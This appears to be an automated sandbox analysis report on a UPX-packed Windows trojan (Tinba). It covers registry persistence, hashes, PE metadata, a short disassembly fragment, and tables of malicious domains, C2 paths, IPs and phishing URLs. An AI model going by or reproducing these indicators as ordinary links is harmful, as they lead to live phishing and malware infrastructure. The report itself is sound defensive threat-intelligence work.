                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
| 19:41:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0C0BC82C C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe |
| 19:41:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0C0BC82C C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe |
| 20:41:00 | API Interceptor | 1x Sleep call for process: winver.exe modified |
| 20:41:00 | API Interceptor | 983x Sleep call for process: explorer.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 216.218.185.162 | java.exe | malicious | Tinba | fccfxejgtpqb.pw/EiDQjNbWEQ/ |
|  | PrintWiz.exe | malicious | Tinba | pxscpwnnqujq.net/el0hjkd76ghs65dhj0it/ |
|  | java.exe | malicious | Tinba | cmnsgscccrej.pw/EiDQjNbWEQ/ |
|  | 3G36K54KKw.exe | malicious | Tinba | ve0t182er814kok.cc/vet0up7gj67sdhjd17up0er/ |
|  | http://hbjtorutqkl.org | malicious | Unknown | hbjtorutqkl.org/ |
|  | http://www.paypr.com | malicious | Unknown | www.paypr.com/ |
|  | Fxj6eiNUQ1.exe | malicious | Unknown | mypark.cc/qa/ |
|  | 1boDHMvtCl.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/ |
|  | N7B5dyjbIS.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/ |
|  | bhiDwU4Geh.exe | malicious | Tinba | qvvksmeemfgd.com/spam/ |
|  | K73CgOgVZ9.exe | malicious | Tinba | qvvksmeemfgd.com/spam/ |
|  | I90gcqKK3m.exe | malicious | Tinba | ggvruxovlbrm.com/spam/ |
|  | KlNXUPV2V9.exe | malicious | Tinba | qvvksmeemfgd.com/spam/ |
|  | 26cCgegATh.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/ |
|  | 4jNfjcMzST.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/ |
|  | PFubud554p.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/ |
|  | xST04RvuDH.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/ |
|  | rTv7jUz1P5.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/ |
|  | 6phPAtxcUR.exe | malicious | Tinba | cmnsgscccrej.pw/EiDQjNbWEQ/ |
|  | IPwhmF3OZ3.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/ |
| 173.222.162.32 | java.exe | malicious | Tinba |  |
|  | java.exe | malicious | Tinba |  |
|  | p2pWin.exe | malicious | Petya / NotPetya, Mimikatz |  |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| mfueeimvyrsp.pw | java.exe | malicious | Tinba | 216.218.185.162 |
|  | sNZuv8N8pu.exe | malicious | Tinba | 216.218.185.162 |
|  | C08nibNrTH.exe | malicious | Unknown | 216.218.185.162 |
|  | 3VPzpw8aQd.exe | malicious | Tinba | 216.218.185.162 |
|  | hyyjqrWo12.exe | malicious | Tinba | 216.218.185.162 |
|  | ph0Z652SJT.exe | malicious | Unknown | 216.218.185.162 |
| vcklmnnejwxx.pw | java.exe | malicious | Tinba | 216.218.185.162 |
|  | java.exe | malicious | Tinba | 216.218.185.162 |
|  | 1boDHMvtCl.exe | malicious | Tinba | 216.218.185.162 |
|  | N7B5dyjbIS.exe | malicious | Tinba | 216.218.185.162 |
|  | PFubud554p.exe | malicious | Tinba | 216.218.185.162 |
|  | 6phPAtxcUR.exe | malicious | Tinba | 216.218.185.162 |
|  | IPwhmF3OZ3.exe | malicious | Tinba | 216.218.185.162 |
|  | sZ8q0q3VNz.exe | malicious | Tinba | 216.218.185.162 |
|  | deOHDeSfAr.exe | malicious | Tinba | 216.218.185.162 |
|  | o2tow8Yiis.exe | malicious | Tinba | 216.218.185.162 |
|  | S6bS8zCitm.exe | malicious | Tinba | 216.218.185.162 |
|  | eddLVK4Ak8.exe | malicious | Tinba | 216.218.185.162 |
|  | oaCC6gQGMe.exe | malicious | Tinba | 216.218.185.162 |
|  | Mb5ahRznK0.exe | malicious | Tinba | 216.218.185.162 |
|  | cBn0fkHo3x.exe | malicious | Tinba | 216.218.185.162 |
|  | s81nbT3Zep.exe | malicious | Tinba | 216.218.185.162 |
|  | tHgi7eqSU8.exe | malicious | Tinba | 216.218.185.162 |
|  | Se7RDF9xyE.exe | malicious | Tinba | 216.218.185.162 |
|  | i3kLBdupx2.exe | malicious | Tinba | 216.218.185.162 |
|  | sNZuv8N8pu.exe | malicious | Tinba | 216.218.185.162 |
| uyhgqunqkxnx.pw | java.exe | malicious | Tinba | 45.77.249.79 |
|  | java.exe | malicious | Tinba | 104.131.68.180 |
|  | 1boDHMvtCl.exe | malicious | Tinba | 192.42.116.41 |
|  | N7B5dyjbIS.exe | malicious | Tinba | 192.42.116.41 |
|  | PFubud554p.exe | malicious | Tinba | 192.42.116.41 |
|  | 6phPAtxcUR.exe | malicious | Tinba | 192.42.116.41 |
|  | IPwhmF3OZ3.exe | malicious | Tinba | 192.42.116.41 |
|  | sZ8q0q3VNz.exe | malicious | Tinba | 192.42.116.41 |
|  | deOHDeSfAr.exe | malicious | Tinba | 192.42.116.41 |
|  | o2tow8Yiis.exe | malicious | Tinba | 192.42.116.41 |
|  | S6bS8zCitm.exe | malicious | Tinba | 192.42.116.41 |
|  | eddLVK4Ak8.exe | malicious | Tinba | 192.42.116.41 |
|  | oaCC6gQGMe.exe | malicious | Tinba | 192.42.116.41 |
|  | Mb5ahRznK0.exe | malicious | Tinba | 192.42.116.41 |
|  | cBn0fkHo3x.exe | malicious | Tinba | 192.42.116.41 |
|  | s81nbT3Zep.exe | malicious | Tinba | 192.42.116.41 |
|  | tHgi7eqSU8.exe | malicious | Tinba | 192.42.116.41 |
|  | Se7RDF9xyE.exe | malicious | Tinba | 192.42.116.41 |
|  | i3kLBdupx2.exe | malicious | Tinba | 192.42.116.41 |
|  | sNZuv8N8pu.exe | malicious | Tinba | 192.42.116.41 |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HURRICANEUS | file.exe | malicious | BazaLoader | 65.49.20.10
HURRICANEUS | hLMpffD0sY.exe | malicious | Nanocore | 216.218.135.117
HURRICANEUS | L3kF56AP0m.exe | malicious | Nanocore | 216.218.135.117
HURRICANEUS | java.exe | malicious | Tinba | 216.218.185.162
HURRICANEUS | Pay-App+for+final+lien+release+requires+your+review.htm | malicious | Unknown | 64.71.144.72
HURRICANEUS | PrintWiz.exe | malicious | Tinba | 216.218.185.162
HURRICANEUS | java.exe | malicious | Tinba | 216.218.185.162
HURRICANEUS | 3G36K54KKw.exe | malicious | Tinba | 216.218.185.162
HURRICANEUS | imaginebeingarm7.elf | malicious | Mirai, Moobot | 170.199.208.0
HURRICANEUS | 2YRmJ2lhap.exe | malicious | Unknown | 72.52.84.202
HURRICANEUS | L8PCdNq0xs.elf | malicious | Mirai | 184.104.188.104
HURRICANEUS | 22iXhC1ACX.elf | malicious | Mirai | 5.152.182.52
HURRICANEUS | oBtxppgLWB.elf | malicious | Mirai | 216.218.165.228
HURRICANEUS | z0r0.x86.elf | malicious | Mirai | 72.14.64.79
HURRICANEUS | 5aHdc3wOqU.elf | malicious | Mirai | 173.242.57.34
HURRICANEUS | Ok003hLQXE.elf | malicious | Mirai | 72.14.64.64
HURRICANEUS | PPh4qGlopz.elf | malicious | Unknown | 184.104.158.219
HURRICANEUS | QbQ0spd3GB.elf | malicious | Mirai | 209.135.12.122
HURRICANEUS | zjkV4N6A5M.elf | malicious | Mirai | 65.49.39.198
HURRICANEUS | 2EDcea0dMU.elf | malicious | Mirai | 65.49.39.187
DIGITALOCEAN-ASNUS | toolspub1.exe | malicious | LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer | 134.209.130.144
DIGITALOCEAN-ASNUS | python.exe | malicious | CobaltStrike | 159.89.124.188
DIGITALOCEAN-ASNUS | arm7.elf | malicious | Mirai | 157.245.182.60
DIGITALOCEAN-ASNUS | 3ZNRd52b3x.elf | malicious | Mirai | 157.245.157.57
DIGITALOCEAN-ASNUS | VXl6IxOofO.exe | malicious | Gurcu Stealer | 164.90.185.9
DIGITALOCEAN-ASNUS | n199svrcQC.elf | malicious | Mirai | 157.245.82.77
DIGITALOCEAN-ASNUS | bt.exe | malicious | Neconyd | 64.225.91.73
DIGITALOCEAN-ASNUS | xVrjcK2VJW.exe | malicious | Lokibot | 142.93.72.33
DIGITALOCEAN-ASNUS | https://login.microsoft-auth.info/file/2fa-compliance/page+authorization.html#coreyk@we-worldwide.com | malicious | HTMLPhisher | 45.55.64.109
DIGITALOCEAN-ASNUS | pdfcentral.exe | malicious | Unknown | 167.172.250.54
DIGITALOCEAN-ASNUS | pdfcentral.exe | malicious | Unknown | 167.172.250.54
DIGITALOCEAN-ASNUS | pBVFNv9jh6.elf | malicious | Mirai | 138.68.122.142
DIGITALOCEAN-ASNUS | 3cuyLzGzyD.elf | malicious | Mirai | 157.230.1.145
DIGITALOCEAN-ASNUS | http://yhtc.waitslotvip.shop/4twZzp2966ZfQW273ylszwngjeo14478IENNWZNBABFXSHI196580PMUT9061Y12 | malicious | Phisher | 45.55.126.207
DIGITALOCEAN-ASNUS | https://n9.cl/rk6b3 | malicious | Unknown | 198.211.98.91
DIGITALOCEAN-ASNUS | SecuriteInfo.com.Python.Stealer.1122.27257.27673.exe | malicious | Creal Stealer | 159.89.102.253
DIGITALOCEAN-ASNUS | https://cmjeu0rug2jtmq11nqdg8ssjm7bqanp58.oast.me | malicious | Unknown | 178.128.209.14
DIGITALOCEAN-ASNUS | http://cmjeu0rug2jtmq11nqdg8ssjm7bqanp58.oast.me | malicious | Unknown | 178.128.209.14
DIGITALOCEAN-ASNUS | https://click.actmkt.com//s/052-31d3cd75-fa72-4087-91b5-f3abd4b30b2f?enr=naahiaduabyaa4yahiac6abpabraa3yamqahsadnabqqa4yaomagcadhabsqayyamuag4aduabsqa4qamqagkadmabuaa2iafyagsadoab6aazqameahmadpabzaaqaammagcadqabzqa5aan4ag4adfab2aayiaoiagiadjabzaa3qam4ac4addabxqa3iapqadcad4ab6aamaaguadeabnaazqamiamqadgaddabsaanyaguac2adgabqqanyagiac2abuaayaaoaag4ac2abzaayqayqaguac2adgaazqayiamiagiabuabraamyagaageabsabtaa7aagaadkabzaawqayyaguadeabzaazqamiaguadcabnabrqazaageadsabnaa2aamiagyadeabnaa4aamaaheagcabnabraamqageadaaddabsqaniagmagiadgaayqazaapqadaabqaayqaliameadcadeaa4qamqagiaggadfaawqaoaagyadgabwaawqanaag4ageabraawqayqagyagiadfaawqanqamyagcadbaazaaziagmagmadeaazaamyagyahyad4abaqa7aa====&mKnBM/FLvMOZbQt#/793969793969/bWVsaXNzYS5iZWxsQHB0LnFsZC5nb3YuYXU | malicious | HTMLPhisher | 167.99.186.218
DIGITALOCEAN-ASNUS | http://etrjsff.pinkagencia.com | malicious | Unknown | 165.227.138.37
AKAMAI-ASUS | python.exe | malicious | CobaltStrike | 23.54.200.159
AKAMAI-ASUS | 2D5770EB59209D2238670233CB2BE6424F7974800B83F.exe | malicious | Unknown | 23.192.229.164
AKAMAI-ASUS | 3ZNRd52b3x.elf | malicious | Mirai | 23.57.232.44
AKAMAI-ASUS | https://far-skateboard-ba2.notion.site/GAFFNEY-Electrical-Services-Pty-Ltd-4f330ac7f10f4d20a77520190e6fd06c?pvs=4%22)%20and%20ContentType:(%221%22) | malicious | HTMLPhisher | 23.49.5.148
AKAMAI-ASUS | yg8uZi8OUS.exe | malicious | Amadey, RisePro Stealer | 104.84.231.73
AKAMAI-ASUS | kyQ6tISCd6.elf | malicious | Mirai | 2.17.183.135
AKAMAI-ASUS | vveZnyJj0e.elf | malicious | Mirai | 125.56.147.156
AKAMAI-ASUS | 2XcXiCaqz1.elf | malicious | Mirai | 104.64.159.190
AKAMAI-ASUS | PO Request From Leonard Adams Insurance.msg | malicious | Unknown | 104.84.231.227
AKAMAI-ASUS | http://googlechrome.com.cn | malicious | Unknown | 23.60.84.29
AKAMAI-ASUS | huhu.arm.elf | malicious | Mirai | 23.36.242.160
AKAMAI-ASUS | huhu.x86.elf | malicious | Mirai | 23.64.233.45
AKAMAI-ASUS | huhu.arm7.elf | malicious | Mirai | 96.25.116.252
AKAMAI-ASUS | Fatturation110124.exe | malicious | Unknown | 23.54.200.159
AKAMAI-ASUS | SecuriteInfo.com.FileRepMalware.7801.14746.exe | malicious | Unknown | 104.108.66.94
AKAMAI-ASUS | https://gtm.steamproxy.vip/market/ | malicious | Unknown | 23.195.238.96
AKAMAI-ASUS | https://hr-a65.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword | malicious | HTMLPhisher | 173.222.196.22
AKAMAI-ASUS | original.eml | malicious | HTMLPhisher | 23.222.155.167
AKAMAI-ASUS | https://energyexplorationtech-my.sharepoint.com/:f:/g/personal/matthew_jordan_energyexplorationtech_onmicrosoft_com/Eutt63ri_fxJp-ldVsqBKcMBig5tJSIRYH8Jz2cCkpGq6A?e=jprcz0 | malicious | HTMLPhisher | 23.194.100.10
AKAMAI-ASUS | OriginalMessage.txt.msg | malicious | HTMLPhisher | 104.112.177.85
Match | Associated Sample Name / URL | Detection | Threat Name | Context
28a2c9bd18a11de089ef85a160da29e4 | python.exe | malicious | CobaltStrike | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://ecv.microsoft.com/PvQb0AQbQ9 | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://far-skateboard-ba2.notion.site/GAFFNEY-Electrical-Services-Pty-Ltd-4f330ac7f10f4d20a77520190e6fd06c?pvs=4%22)%20and%20ContentType:(%221%22) | malicious | HTMLPhisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | SecuriteInfo.com.Trojan-Downloader.MSIL.Agent.29786.22815.exe | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cbiblec4me.com/svenska-tonaring-januari/?s=Vi&pvhem=7291&fbclid=IwAR0IJuMChf4diWNNNE_TVlaTVIj6q2oYBcrCU2ZjnsisQ53ajsuET3RHXPg | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://jp.mmerricari.com.yiyaodao.com/pc/index.php | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl7.fdttadtyu.pics/tWBxach3/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl3.fdttadtyu.pics/6oagaY3v/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl8.fdttadtyu.pics/mTaVSoo9/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl9.fdttaytyu.pics/GvD5PILg/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl6.tuygbtyui.pics/2NNEwCmQ/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl9.fdttadtyu.pics/Rpyj3JnM/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl7.tuygbtyui.pics/zoXMHadJ/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://jfwbgwiugeq2ohfqofh16.z13.web.core.windows.net/win/ | malicious | GRQ Scam | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cl8.tuygbtyui.pics/Wzj9UweA/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://kog.pages.dev/robots.txt | malicious | HTMLPhisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://uiokkrtsghmr.pics/gTEfR8nB/index.html | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | View - (1)Fax.eml | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://m25z98brt5vb2m93fi0p.storage.googleapis.com/m25z98brt5vb2m93fi0p-i#cl/9810_md/1110/6902/1803/54/981368 | malicious | Phisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://m25z98brt5vb2m93fi0p.storage.googleapis.com/m25z98brt5vb2m93fi0p-u | malicious | Unknown | 173.222.162.32
No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: modified
Size (bytes): 82400
Entropy (8bit): 5.7978449631526905
Encrypted: false
SSDEEP: 1536:0oA2ul/D/Mb616FUFtWoA2iG/Dyqb61NBUFgK:+8UFqBUF3
MD5: 51AA9F7524C37CD4FF3C1CB6485DD6C0
SHA1: A43B6A2F609684A1F0EBE1739C7264190A89DC54
SHA-256: 1AD5A6217415DC4602ACC180CB886E13B613A7DAF188B3D5C5CE059C3D589B4A
SHA-512: B0252E62BEDB5771765E4C7FD574FBCD4BCD3EA83E211237DCBCA704F1E56F388045F8205D39EC14A22DF1BDDDC28A12C85E13F0AC48833A51D0E8C79266B728
Malicious: false
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: Unicode text, UTF-8 text, with very long lines (45174), with no line terminators
Category: dropped
Size (bytes): 45182
Entropy (8bit): 5.035762643577828
Encrypted: false
SSDEEP: 768:5MZG7xRKm1A1a/Qh/qLPvkc1mYyPdT9SWrRW:5LcrW
MD5: 6BA6B68478FF5B7338BA6F984A7B9760
SHA1: E892E5DF7C4EF6C7852A821E00A5AB97B7E5F229
SHA-256: A2608837DBCD3D389F738B4163F0123D7A277BAE208108F8D8CD2F53AD8981F1
SHA-512: DBD715601693B18E5288345AB3EC1683C2A639C46E11E7B601A044E48AB20E33CCDA54ED4A6023999F1F806563963635CAD2DC03A84484A6BDE474A7390205FE
Malicious: false
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 37421
Entropy (8bit): 4.611252091103942
Encrypted: false
SSDEEP: 768:6UjQxwcuyEZDqRKmJHGHly84yeiEaFHm2iLOOXYcc2jZ:b6y5U5Jkb4yej+vUOOoujZ
MD5: 9BDE56D9C4532F269928C5CE1FF2560D
SHA1: FB816F6AAF8B7FF7CBB0B521A9D30BAA52CDDB7F
SHA-256: 89DE51E447ED49F7748B3D9C077B97703629575241D5BE61EAB5D4196C6CECAD
SHA-512: DFB9548743887463AB6161D0972E6BB501BF4576D0CDAF1A7C7EE1E427DF59361BBD128D034AB45B68C8E48CA645022E39C5507A439074B30489E25F390760FF
Malicious: false
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 5
Entropy (8bit): 2.321928094887362
Encrypted: false
SSDEEP: 3:Dy:W
MD5: 34BD1DFB9F72CF4F86E6DF6DA0A9E49A
SHA1: 5F96D66F33C81C0B10DF2128D3860E3CB7E89563
SHA-256: 8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
SHA-512: E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
Malicious: false
Preview: 0.1..
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 5
Entropy (8bit): 2.321928094887362
Encrypted: false
SSDEEP: 3:Ay:Ay
MD5: C204E9FAAF8565AD333828BEFF2D786E
SHA1: 7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
SHA-256: D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
SHA-512: E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
Malicious: false
Preview: 0.2..
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: data
Category: dropped
Size (bytes): 50373
Entropy (8bit): 3.7533011813000954
Encrypted: false
SSDEEP: 1536:2crkq/9PYdKNAd1d0f41H1Ii0OyAAZXjLdk6nMUisfhteVoVPPP8qoEYhk5+6DC3:2ckq/1YdKNAd1d0f41H1Ii5yAAZXHdep
MD5: 42C6CF763BC1DCEFD79C0E5262E7DFC4
SHA1: 2EAA3A2B1557ED78CA1166EB007608137E52C343
SHA-256: 99205F34B2E4960BE69575908CF5BC9C57A32A240105848EE998E1E79F240707
SHA-512: 73B48317D927329B24F59C164CEA53D0A8AF6456F8CD8F93A285286696626E15B1E2BE286A39310D4772A6263D6AB43710A07392B501324732FADBF8F50DB487
Malicious: false
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: data
Category: dropped
Size (bytes): 1126006
Entropy (8bit): 6.147114410359821
Encrypted: false
SSDEEP: 24576:AoLr7YfoyFxz8GfoLr7YfoyFxz8G21it:AMwf1xz8GfMwf1xz8G2
MD5: 5665CA72FB1FE8FF993E1F56C8EDB387
SHA1: 11C371B293397DEE3289435CC6F797110D5A631B
SHA-256: 263D203F23A1E59D7FECA90148F7ED49333CD1CC607C58B4EEEDC1BF3A84F8C8
SHA-512: 5601C99D230FC811D192E23B4537048A86200532CE5A402749FCF687BBC23DF2E52CC3E8597E79E94A4E7CCF8945C825EA2A7EB93DD9A1F2204F28501E7FDBA1
Malicious: false
Process: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type: JSON data
Category: dropped
Size (bytes): 114941
Entropy (8bit): 5.179500563537803
Encrypted: false
SSDEEP: 384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
MD5: ED10444C46BD13DBDCC387D36132F171
SHA1: 3E2D788FBFE3DD9472AE92F934A944343C9238F2
SHA-256: 2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
SHA-512: 0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
Malicious: false
                                                                                                                                                              Process:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):112768
                                                                                                                                                              Entropy (8bit):5.340092545821249
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:KiLOvRmmQegJfBbmAQ256/ZrwWnwqjhurmKFcxL8JQ2r0Eg:KiyvRmDLs/ZrwWJjAqGcRJ2hg
                                                                                                                                                              MD5:CC18A03FCBC9DCF9DF31B64689EB3E55
                                                                                                                                                              SHA1:A10BFE77CB47103B1D909BE2FF5A5F48BB476071
                                                                                                                                                              SHA-256:250D35E8D6E571820344432ADEF717F30BD011C94FE132E77F58994FAA268FE6
                                                                                                                                                              SHA-512:5E911E14F237B8BF1062F25F21436C6D7111C1589C068625E982DFFC26883F6429BE74AC13C3D713E25BC5DC960BD6EF4796F2CCE4FC1DAB3074B16E24AECB48
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L.....TT.............................Z............@.....................................................................................8...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@....imports............................@...........................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Entropy (8bit):5.3400867518092765
TrID:
• Win32 Executable (generic) a (10002005/4) 99.66%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:java.exe
File size:112'768 bytes
MD5:b471d5f706df69a4a28664d7e335a9da
SHA1:995a757d4562d9f4e8231f359b4b78db2de1c1f0
SHA256:223534841809356aa7c94f86e8b0f4d6b4ce317b8225b419b27a5ba320ab0b81
SHA512:2bfeba6b8aec4caafd508644f08d3a70de469485c0c4e5220c231f024b5b48c9058896bdb55d5faccda6fad51402b6c10ffdbe8cc0612bebad81cd214c8238c3
SSDEEP:1536:JiLOvRmmQegJfBbmAQ256/ZrwWnwqjhurmKFcxL8JQ2r0Eg:JiyvRmDLs/ZrwWJjAqGcRJ2hg
TLSH:71B34B62F204E88BE817D8F69919CD3168A33DBD4890855E32D97F6D58B3AD30459F0F
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L...,9TT...........................
Icon Hash:d08c8e8ea2868a54
Entrypoint:0x405a80
Entrypoint Section:UPX0
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x5454392C [Sat Nov 1 01:36:44 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:d39aa71a62356d5bd05b3ccf2dfedd9e
Instruction
push ebp
mov ebp, esp
push ebx
push esi
sub esp, 38h
mov dword ptr [ebp-10h], 00000000h
mov eax, dword ptr [ebp-10h]
mov dword ptr [ebp-2Ch], 00000001h
mov ecx, dword ptr [ebp-2Ch]
mov dword ptr [ebp-20h], 00000000h
mov word ptr [ebp-22h], 2D5Bh
mov edx, dword ptr [ebp-20h]
mov dword ptr [ebp-28h], 00000007h
mov esi, dword ptr [ebp-28h]
mov byte ptr [ebp-2Dh], 00000052h
mov bl, byte ptr [ebp-2Dh]
mov word ptr [ebp-30h], 796Dh
mov byte ptr [ebp-09h], bl
mov eax, dword ptr [ebp+00h]
mov dword ptr [0040DD44h], eax
lea eax, dword ptr [ebp+04h]
mov dword ptr [0040DD48h], eax
mov dword ptr [esp], esi
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-38h], ecx
mov dword ptr [ebp-3Ch], edx
call 00007F5D907FB55Eh
mov ecx, dword ptr [ebp-3Ch]
cmp eax, ecx
je 00007F5D907FB99Eh
mov ax, 0000h
mov cx, word ptr [ebp-30h]
mov dx, ax
sub dx, word ptr [ebp-30h]
mov word ptr [ebp-30h], dx
sub ax, word ptr [ebp-30h]
or cx, 1256h
mov word ptr [ebp-30h], cx
mov word ptr [ebp-22h], ax
mov esi, dword ptr [ebp-38h]
mov dword ptr [ebp-14h], esi
jmp 00007F5D907FB984h
mov ax, 0000h
mov ecx, dword ptr [ebp-34h]
mov dword ptr [ebp-14h], ecx
sub ax, word ptr [ebp-22h]
mov word ptr [ebp-22h], ax
mov eax, dword ptr [ebp-14h]
mov cx, word ptr [ebp-22h]
and cx, 0673h
mov word ptr [ebp-22h], cx
add esp, 38h
pop esi
pop ebx
pop ebp
ret
add byte ptr [eax], al
Programming Language:
• [ASM] VS2005 build 50727
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [C++] VS2005 build 50727
• [RES] VS2005 build 50727
• [LNK] VS2005 build 50727
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1d000          0x8c          .imports
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1c000          0x638         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
